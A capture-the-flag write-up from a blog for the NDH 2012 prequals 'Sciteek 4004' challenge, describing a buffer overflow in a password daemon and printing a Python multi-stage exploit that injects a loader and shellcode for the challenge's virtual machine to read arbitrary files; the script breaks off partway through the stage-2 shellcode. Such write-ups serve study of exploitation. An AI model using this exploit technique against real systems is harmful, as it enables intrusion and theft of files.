codezen.fr code hacking, zen coding

26Mar/12Off

NDH 2012 Prequals – Sciteek 4004 Write-up – Multistage file reader

Posted by aXs

The daemon on port 4004 is a fairly simple daemon that check for a password (hard-coded in the binary) and just says "You are authenticated".

What's interesting is that this daemon is running on the same server that many other challenges so we used it to fetch files and solve the URL Shortener challenge more easily by retrieving its Python source.

We have limited space for the shellcode, only 100 bytes. While you can totally read files in a 100 bytes shellcode if you don't care about error checking, I wanted something cleaner (that's the excuse for spending time to do a multi-stage exploit loader)

This exploit will:
- overflow the buffer (size is 0x100)
- Inject stage 1 loader
- Read Stage 2 from stdin
- Execute Stage 2
- Read filename to dump from stdin
- Open file with error checking
- Dump the file using a read/write loop, so you can dump file bigger than the memory
- Exit

#!/usr/bin/env python

import socket
import sys
import time
from struct import pack

if len(sys.argv) != 4:
  print '\nUsage:\t./sciteek4004.py [host] [port] [filename]'
  sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2])

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))

data = s.recv(65536)
print 'Received', repr(data)

''' Stage 2 '''
''' Read filename from stdin, output to stdout '''

sc  = "\x04\x02\x01\x00\x00"  # movl r1, 0x0
sc += "\x04\x02\x00\x03\x00"  # movl r0, 0x3
sc += "\x04\x02\x02\x94\x7a"  # movl r2, 0x7b94
sc += "\x04\x02\x03\x32\x00"  # movl r3, 0x32
sc += "\x30"      # syscall (read)

sc += "